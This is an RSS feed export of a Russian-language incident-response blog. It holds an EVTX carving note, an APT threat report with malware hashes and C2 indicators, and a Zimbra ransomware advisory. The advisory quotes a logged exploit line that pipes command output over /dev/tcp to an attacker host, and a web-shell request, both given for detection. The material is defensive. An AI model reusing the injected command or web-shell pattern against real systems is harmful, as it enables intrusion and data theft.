<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>dfir &#8211; PT ESC</title>
	<atom:link href="/tag/dfir/feed/index.xml" rel="self" type="application/rss+xml" />
	<link>/</link>
	<description></description>
	<lastBuildDate>Mon, 05 Oct 2026 13:05:41 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=7.1.3</generator>

<image>
	<url>/wp-content/uploads/2026/09/cropped-cropped-large_icon-32x32.png</url>
	<title>dfir &#8211; PT ESC</title>
	<link>/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Восстановление EVTX-записей: методы карвинга</title>
		<link>/recovering-evtx-records-carving-methods/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Wed, 23 Sep 2026 14:49:54 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">/%d0%b2%d0%be%d1%81%d1%81%d1%82%d0%b0%d0%bd%d0%be%d0%b2%d0%bb%d0%b5%d0%bd%d0%b8%d0%b5-evtx-%d0%b7%d0%b0%d0%bf%d0%b8%d1%81%d0%b5%d0%b9-%d0%bc%d0%b5%d1%82%d0%be%d0%b4%d1%8b-%d0%ba%d0%b0%d1%80%d0%b2/</guid>

					<description><![CDATA[Восстановление EVTX-записей: методы карвинга 🧩 При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных машин, нередко возникает ситуация, при которой файловая система повреждается настолько, что штатное монтирование становится невозможным. Восстановить ее вручную теоретически…]]></description>
										<content:encoded><![CDATA[<p><strong>Восстановление EVTX-записей: методы карвинга</strong> 🧩</p>
<p>При расследовании инцидентов, когда злоумышленники шифруют образы виртуальных машин, нередко возникает ситуация, при которой файловая система повреждается настолько, что штатное монтирование становится невозможным. </p>
<p>Восстановить ее вручную теоретически можно, но это отнимает много времени и сопровождается потерями данных. В таких случаях применяется карвинг — побайтовый поиск сигнатур непосредственно в сыром образе, в обход файловой системы.</p>
<p>❗️ <strong>Команда PT ESC IR уделяет приоритетное внимание автоматизации разбора артефактов для последующего обнаружения вредоносной активности</strong> — это ускоряет восстановление картины инцидента. </p>
<p>Наш пайплайн преимущественно реализован на Go, поэтому мы разработали собственную библиотеку на том же языке. Она разбирает готовые EVTX-файлы даже при несовпадении контрольных сумм или повреждении файла, а также выполняет карвинг событий из побитовых копий, дампов памяти и образов виртуальных дисков.</p>
<p>О том, что поддается восстановлению и почему одни подходы дают полную структуру записи, а другие — лишь отдельные поля, <a href="https://habr.com/ru/companies/pt/articles/1084600/" rel="noopener" target="_blank">читайте в нашем материале на Хабре</a> 🫲</p>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#tip</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Операция Chewbacca</title>
		<link>/operation-chewbacca/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Tue, 15 Sep 2026 11:43:48 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[APT]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[TI]]></category>
		<guid isPermaLink="false">/%d0%be%d0%bf%d0%b5%d1%80%d0%b0%d1%86%d0%b8%d1%8f-chewbacca/</guid>

					<description><![CDATA[В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум на нефтегазовые компании и финансовый сектор. В ходе атак злоумышленники преследуют деструктивные цели, при этом достаточно…]]></description>
										<content:encoded><![CDATA[<p>В конце июня команда PT ESC в ходе расследования инцидентов обнаружила новую группу, нацеленную как минимум на нефтегазовые компании и финансовый сектор.</p>
<p>В ходе атак злоумышленники преследуют деструктивные цели, при этом достаточно долго сохраняют присутствие в скомпрометированной инфраструктуре.</p>
<p>При перемещении в инфраструктуре используются преимущественно <code>WinRM</code> (как правило, в сочетании с <a href="https://github.com/WinRb/winrm-fs/" rel="noopener" target="_blank">WinRb</a>) и <code>SSH</code>.</p>
<p>Для закрепления в инфраструктуре используются в основном серверные машины с большим аптаймом (<code>Windows\Linux</code>), закрепление осуществляется посредством сервисов в обоих случаях. В качестве полезных нагрузок используется широкий набор инструментов:</p>
<ul>
<li>Агенты для фреймворка <a href="https://github.com/Ne0nd0g/merlin" rel="noopener" target="_blank">merlin</a>.</li>
<li>Агент на базе <a href="https://github.com/NHAS/reverse_ssh" rel="noopener" target="_blank">reverse_ssh</a>.</li>
<li>Утилита <code>GoSocks5Proxy</code> на базе <a href="https://github.com/things-go/go-socks5" rel="noopener" target="_blank">go-socks5</a>.</li>
<li><code>ReverseProxy</code> — собственная утилита на Rust.</li>
<li>Бэкдор <code>GoRinet</code>. Использует шифрование конфига с ключом, формируемым на базе физического адреса сетевого адаптера.</li>
</ul>
<p>🐻 Для совершения деструктивных действий используется разнообразное ПО, в том числе по ряду признаков разработанное с использованием ИИ.</p>
<ul>
<li>Вайпер <code>T-Riper</code> для сетевых устройств производства <code>Cisco</code>/<code>Huawei</code> — удаление образов, сброс конфигурации устройства, ребут. Используются в сочетании с bash-скриптами для запуска по удаленным целям.</li>
<li>Кастомный вайпер для удаленного удаления данных <code>QNAP</code>.</li>
<li>Для шифрования данных на машинах под управлением ОС Windows используется комплекс ВПО, состоящий из оркестратора (с возможностью отправки отчета о прогрессе шифрования на удаленный C2). Порождение вайперов осуществляется многопоточно, причем отдельные исполняемые файлы создаются с добавлением «мусора» в оверлей для уклонения от обнаружения. Для автоматизированного распространения по сети используются файлы конфигов с указанием известных кредов ранее скомпрометированных УЗ и целевых подсетей.</li>
</ul>
<p>Также отмечено использование уязвимости <code>CVE-2026-31431</code> (<a href="https://github.com/tgies/copy-fail-c" rel="noopener" target="_blank">CopyFail</a>) для повышения привилегий, кастомного инструмента <code>CredsReseter</code> для сброса паролей УЗ Linux-подобных систем и Windows-скриптов для дампа кредов сторонних сервисов.</p>
<h2>Рекомендации:</h2>
<ul>
<li>Осуществить поиск и мониторинг индикаторов компрометации.</li>
<li>Провести сигнатурное сканирование.</li>
<li>Обновить ОС.</li>
</ul>
<h2>IoCs</h2>
<h4>Файловые индикаторы:</h4>
<table>
<tr>
<th>Name</th>
<th>MD5</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td><code>acgid</code></td>
<td>9f7a688faf61d895a5c1d09084f16436</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/1f43e287-7d1a-45d8-a9ac-3c1bde73f353" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>cf</code></td>
<td>4c5b89504269b1d73ee5b6449559da4b</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/03639742-ad58-416f-9299-640c4c604a95" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>mnworker.exe</code></td>
<td>a6d00278363e4916c4bc6ff6f36dfe6f</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/cc009c93-fafa-4d3c-ac89-da2639210b40" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>NetConfigSvc.exe</code></td>
<td>56fd630da404d4d8c5afd17eb3506b41</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b4c8d275-6f28-4f80-b248-8cddfeaa24ea" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>NetSvcHelper.exe</code></td>
<td>272625644208beab5daa79f676efab9a</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e2c082a5-61e9-4506-bae9-9b2ec1c5d374" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>powerd</code></td>
<td>0def5f0f50482c887a8fa645e1347e8d</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/b57e6b4d-46a4-4e41-9c7a-2a58df95885f" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>ProcessMonitor.exe</code></td>
<td>85a9e9de754b99095644726faf6124f7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9b04a605-b1bf-41a9-8abb-f2268c467dc8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>fe323f8f6d84464b7a7f35d694c64851</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ee4946ff-05be-4ffd-aa6c-9be8178d5467" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>3874e14eda06779d777f182c39ac9dfe</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/def73865-f356-4ae8-909f-7f75cc7e8c3e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>rinetd</code></td>
<td>1841b49525e0b3ca1a17556e6af775c7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ce98287b-092a-4208-867d-138857a40d1c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-acpid</code></td>
<td>fc5a346c6bbec19a8463977e05fa14c2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/caa88e55-b725-4623-9fc8-42412fceecfc" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-acpid</code></td>
<td>aa59ebd082118ab7c0a0fded580364da</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/4d018ec6-d77d-4ec4-a6f0-c9eeb909efa1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-network-check</code></td>
<td>fe323f8f6d84464b7a7f35d694c64851</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/035f473d-b4f0-42b4-aad0-bd8609e3a4f1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>cc622348b636e654d68763447cdb4599</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/92ca1443-bbd9-4a57-b9a3-4ed19b9b7fe0" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>517ae29a0048d9f21d0debe9476b94e5</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/8e32f73f-203a-408f-a66e-123e35003ed4" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-rinetd</code></td>
<td>40c5c2686fbc451386fc296994664fa2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/833a1f01-ff28-4f92-80c2-f2fd0d7ef11e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>9dec74a38d9b6e668d616b2ec45159d5</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2204c96f-eaeb-4e10-be93-a9117872e683" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>0df3c7d1f30e984318cf3a3a98b9d4d2</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6b597426-c69c-4393-a6c3-991ac50df2a9" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>systemd-udiskd</code></td>
<td>005b0b12b59930845fabc6f45c6ca725</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5dc5700c-910a-41ad-afc8-cc33e701e188" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>test</code></td>
<td>85ba7a059f33bf40fb1386fd506b38a7</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/901a17cb-c300-4787-b80c-b90bf10592d7" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>udiskd</code></td>
<td>846ec88090311868d4e19658ef538077</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5174b645-410d-4985-8aa7-4df97aa2d92c" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>update</code></td>
<td>4b6526c735279faf3f938e480c75471b</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7ddb51b6-a903-4f7a-b3a7-642c6acaeef6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>w.exe</code></td>
<td>0acd888653dba95628f3f403f3c03295</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9117b8f8-c441-4466-8734-8f53b54a70a3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>watchdog.exe</code></td>
<td>d363776b4adc2f3a513e0637eb7e957f</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fe0b49cb-092d-43bb-a8f0-c8803b232afe" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>worker.exe</code></td>
<td>b6e904360c346665117dc97a096f8f96</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/dd44a163-c8d7-41da-bf01-492809af4fa6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix_trapper</code></td>
<td>e54147cf021827f5eb9c19f41e561aa3</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/53d7cec5-7436-4132-a986-2b3f28b82959" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix_trapper</code></td>
<td>da1d0a016d5ee5190475fe0a8d69e139</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/f4ecd8b1-f8c5-4e88-a54a-4edd1f15faf2" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-agent</code></td>
<td>e8cdefcbf2850a233fe6f13f22ec0efb</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/7b67039c-1f2c-419f-bc11-0ff9cf1a7a36" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-trapper</code></td>
<td>860fd8008365a3e61a21328b0c431076</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/910a909d-6635-4704-89b1-270c3845fa35" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>zabbix-trapper</code></td>
<td>72fbfee7fabc9be88f263604addb1860</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/2595466a-78f9-4893-aa13-b55aec171e40" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>znfs.exe</code></td>
<td>31d4623ef6d7501c48ac2b3f47e3db16</td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6133992e-db1f-4625-891f-5b9bba613c05" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<h4>Сетевые индикаторы</h4>
<table>
<tr>
<th>Адрес</th>
<th style="text-align:center">PT Fusion</th>
</tr>
<tr>
<td><code>adv-click-track.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/340ebc5f-fbcc-428f-8326-d376176cd547" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>adv-click-track.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/60779cde-8139-4c22-87ec-0644482691f8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>cdn.debian-check.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/ec2009ca-6479-4091-91f7-67fd3ca5fc55" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>check.cert-update.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/9e305ae2-8a50-4efc-a78d-1f6afac461da" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>dpkg.debian-check.cloud</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/3a06f1b2-9e00-48cb-bc28-973d136abff8" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>scrt.vdyke.online</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/fcb62ad0-8212-4361-aacb-947a17ac0fff" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>status.cert-update.space</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/912be00e-8521-45aa-b958-d160b377986e" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>195.58.137.115</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e5eb7d34-2df4-41d6-916e-5977ab2897d3" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>199.119.136.138</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/384d0b0e-ed0b-44b9-9f60-01dc4f3cd120" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>213.139.205.166</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/5d226d28-23ef-4dbf-9be6-1b83794ff478" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>216.146.26.31</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/af843866-7e01-4bbc-ac9e-e3eef7c8c431" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>45.145.171.112</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/6bee73b4-d2bf-4c5b-a915-29e52796e9f1" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>45.59.170.247</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/e36e99b7-0c72-48b2-9a2b-a1c54a93a1c6" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>91.221.191.228</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/126d3776-d330-4fcd-93b0-36774d1fdf02" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>94.124.160.113</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/afadbed6-2ee9-4b30-a114-9d8c8a97f88a" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
<tr>
<td><code>94.124.160.12</code></td>
<td style="text-align:center"><a href="https://fusion.ptsecurity.com/shared/iocs/c20b7fda-0f31-4c6a-8477-7b770d62ee93" rel="noopener" target="_blank">Открыть ↗</a></td>
</tr>
</table>
<p><span class="hashtag">#ir</span> <span class="hashtag">#dfir</span> <span class="hashtag">#ti</span> <span class="hashtag">#malware</span> <span class="hashtag">#apt</span> <span class="hashtag">#ioc</span> <br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Ваш сервер Zimbra под угрозой</title>
		<link>/your-zimbra-server-is-at-risk/</link>
		
		<dc:creator><![CDATA[oUth0R]]></dc:creator>
		<pubDate>Thu, 10 Sep 2026 16:23:41 +0000</pubDate>
				<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[cve]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[dfir]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[ir]]></category>
		<category><![CDATA[malware]]></category>
		<guid isPermaLink="false">/%d0%b2%d0%b0%d1%88-%d1%81%d0%b5%d1%80%d0%b2%d0%b5%d1%80-zimbra-%d0%bf%d0%be%d0%b4-%d1%83%d0%b3%d1%80%d0%be%d0%b7%d0%be%d0%b9/</guid>

					<description><![CDATA[Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости CVE-2026-73570 и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на…]]></description>
										<content:encoded><![CDATA[<p>Недавно наша команда PT ESC IR столкнулась с новой атакой ransomware-группировок на почтовые серверы Zimbra с использованием уязвимости <a href="https://nvd.nist.gov/vuln/detail/cve-2026-73570" rel="noopener" target="_blank">CVE-2026-73570</a> и шифровальщика TargetZimbra. По информации из открытых источников аналогичные атаки массово фиксируются на серверах Zimbra с середины августа.</p>
<p><em>Дисклеймер: если вы используете неактуальную версию ПО Zimbra и не обнаружили на своем почтовом сервере приведенных ниже индикаторов компрометации конкретной кампании шифровальщика TargetZimbra, то это не значит, что ваш сервер гарантированно не скомпрометирован. Уязвимость CVE-2026-73570 может использоваться другими злоумышленниками, например, для установки майнеров, а также APT-группировками, нацеленными на компрометацию инфраструктуры всей организации.</p>
<p></em></p>
<blockquote>
<p>Уязвимость CVE-2026-73570 позволяет атакующему осуществлять внедрение и выполнение вредоносных команд на почтовом сервере Zimbra с правами пользователя zimbra без предварительной аутентификации в результате недостаточной санации ввода в компоненте SNMP.</p>
<p>Для успешной эксплуатации на почтовом сервере должна быть установлена версия ПО Zimbra Collaboration Suite ниже 10.1.20, а также установлен пакет zimbra-snmp и включены SNMP-уведомления. Уязвимость эксплуатируется в результате отправки специально сформированного SMTP-запроса через порты 25, 465 или 587.</p>
</blockquote>
<p>👀 <strong>Сценарий атаки:</p>
<p></strong>1. В результате эксплуатации уязвимости CVE-2026-73570 злоумышленники создают на почтовом сервере файл <code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.txt</code> (или <code>versions.txt</code>), содержащий сведения об используемой на сервере версии ПО Zimbra. Созданный файл является для атакующего индикатором успешной эксплуатации уязвимости.</p>
<p>2. На следующем этапе злоумышленники загружают JSP-шеллы в директорию почтового сервера <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>. Кроме того, зафиксировано внедрение на сервер хакерского инструмента Gsocket. Ранее мы уже писали подробную заметку о том, <a href="https://t.me/ptescalator/112" rel="noopener" target="_blank">как детектировать инструмент Gsocket</a>.</p>
<p>3. Далее злоумышленники загружают шифровальщик TargetZimbra, написанный на языке Go. После запуска указанный вредоносный модуль шифрует файлы с использованием алгоритма ChaCha20 в каталоге /opt/zimbra/ и его подкаталогах.</p>
<p>4. После шифрования файлов шифровальщик изменяет их расширение на <code>.elock</code>, а также создает в зашифрованных директориях файлы <code>!README_RECOVER.txt</code>, содержащие контактную информацию и сведения для выкупа расшифровки данных. По окончании работы вредоносный модуль TargetZimbra удаляет себя из системы.</p>
<p>📫 <strong>Как проверить ваш почтовый сервер Zimbra на предмет наличия признаков компрометации?</p>
<p></strong>1. В основном системном журнале почтовой службы<code> /var/log/maillog</code> записи, содержащие подстроку <code>changed from stopped to</code>, перед которой записана shell-команда или иная подозрительная нагрузка, являются признаком эксплуатации уязвимости CVE-2026-73570.</p>
<p>Для поиска вредоносных событий на вашем сервере может использоваться следующая команда: <code>grep &quot;changed from stopped to&quot; /var/log/maillog</p>
<p></code>Пример выполнения команды <code>id</code> и передачи ее вывода на С2-сервер злоумышленников:</p>
<pre><code>Aug 29 14:23:46 zimbra-server postfix/submission/smtpd[108829]: improper command pipelining after EHLO from unknown[[REDACTED_IP_1]]: : Service status change: h ;id&gt;/dev/tcp/[REDACTED_IP_2]/1337; changed from stopped to running\r\nQUIT\r\n  

- время эксплуатации уязвимости: 29 августа 2026 года в 14:23:46; 
- [REDACTED_IP_1]: С2 адрес злоумышленников; 
- id&gt;/dev/tcp/[REDACTED_IP_2]/1337: команда для выполнения на системе.</code></pre>
<p>2. Наличие нестандартных JSP-файлов, которые не относятся к ПО Zimbra и были созданы либо изменены за последние месяцы в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах. Характерными признаками вредоносных JSP-файлов являются наличие обфусцированного кода, закодированных строк, а также нетипичная обработка GET- и POST-запросов.</p>
<p>Для поиска недавно созданных или измененных JSP-файлов на вашем сервере могут использоваться следующие команды:</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newermt &#039;2026-07-01&#039;</code> (поиск по дате изменения файла)</p>
<p><code>find /opt/zimbra/jetty_base/webapps/zimbra/ -type f -iname &#039;*.jsp&#039; -newerBt &#039;2026-07-01&#039;</code> (поиск по дате создания файла)</p>
<p><em>Обратите внимание, что не все файловые системы Linux хранят дату создания файла. Если система не отслеживает указанную метку, то команда find выдаст ошибку.</p>
<p></em>Также проверьте сервер антивирусными средствами.</p>
<p>3. В журнале доступа WEB-сервера (например, для WEB-сервера Nginx стандартное расположение <code>/var/log/nginx/access.log</code>) записи об обращении к нестандартным JSP-файлам (с кодом ответа 200), расположенным в каталоге <code>/opt/zimbra/jetty_base/webapps/zimbra/</code> и во всех его подкаталогах (в частности, часто используемый каталог <code>/opt/zimbra/jetty_base/webapps/zimbra/public/</code>), могут свидетельствовать о наличии WEB-shell&#039;ов на почтовом сервере. Если WEB-shell получает команды через GET-запрос, то передаваемая команда будет отображена в журнале.</p>
<p>Пример вывода результата выполнения команды <code>ls</code> в браузер атакующего:</p>
<pre><code>[REDACTED_IP] - - [29/Aug/2026:12:41:35 +0000] GET /public/bzng.jsp?p=ls HTTP/1.0 200 443 - Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 34889  

- [REDACTED_IP]: С2 адрес злоумышленников; 
- [29/Aug/2026:12:41:35 +0000]: время обращения к WEB-shell; 
- public/bzng.jsp: расположение WEB-shell; 
- ls: выполняемая команда.</code></pre>
<p>Кроме того, исследуя сетевую инфраструктуру злоумышленников, мы обнаружили WEB-панели платформы <a href="https://github.com/Ed1s0nZ/CyberStrikeAI" rel="noopener" target="_blank">CyberStrikeAI</a>, размещенные на нескольких С2-серверах (<em>скриншоты 1 и 2</em>).</p>
<figure class="wp-block-image"><img width="1024" height="834" src="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-1024x834.jpg 1024w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-300x244.jpg 300w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41-768x625.jpg 768w, /wp-content/uploads/2026/09/photo_616@10-09-2026_16-23-41.jpg 1045w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 1</figcaption></figure>
<p><code>CyberStrikeAI</code> — открытая платформа, предназначенная для автоматизации тестирования на проникновение с использованием ИИ.</p>
<figure class="wp-block-image"><img width="1024" height="523" src="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1024x523.jpg 1024w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-300x153.jpg 300w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-768x392.jpg 768w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-1536x784.jpg 1536w, /wp-content/uploads/2026/09/photo_617@10-09-2026_16-23-41-2048x1046.jpg 2048w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /><figcaption>Скриншот 2</figcaption></figure>
<p>Наличие работающей платформы на С2-сервере злоумышленников может указывать на ее применение как на отдельных этапах атаки (например, первоначальной компрометации сервера), так и в рамках всего инцидента.</p>
<p>💡 <strong>Рекомендуем:</p>
<p></strong>1. Обновить ПО Zimbra на вашем почтовом сервере до актуальной версии. В идеале также переустановить ОС сервера с переносом всех почтовых данных.</p>
<p>2. В случае невозможности быстрого обновления ПО временным решением может быть отключение SNMP-уведомлений и удаление пакета <code>zimbra-snmp</code>.</p>
<p>3. Кроме того, проверьте почтовый сервер антивирусными средствами, а также вручную посмотрите нестандартные JSP-файлы, созданные за последние месяцы в служебных каталогах Zimbra.</p>
<p><strong>Файловые индикаторы компрометации:</strong></p>
<blockquote>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/version.tx</code>t или <code>versions.txt</code> — файл, содержащий версию ПО Zimbra;</p>
<p><code>/opt/zimbra/jetty_base/webapps/zimbra/public/[Filename].jsp</code> — WEB-shell;</p>
<p><code>/opt/zimbra/log/defunct</code> — Gsocket;</p>
<p><code>elockc[a-z]</code> (например, <code>elockcl</code>) — шифровальщик;</p>
<p><code>runloop.sh</code> — скрипт, создаваемый шифровальщиком;</p>
<p><code>!README_RECOVER.txt</code> — записка злоумышленников;</p>
<p><code>*.elock</code> — файлы с расширением <code>.elock</code>.</p>
</blockquote>
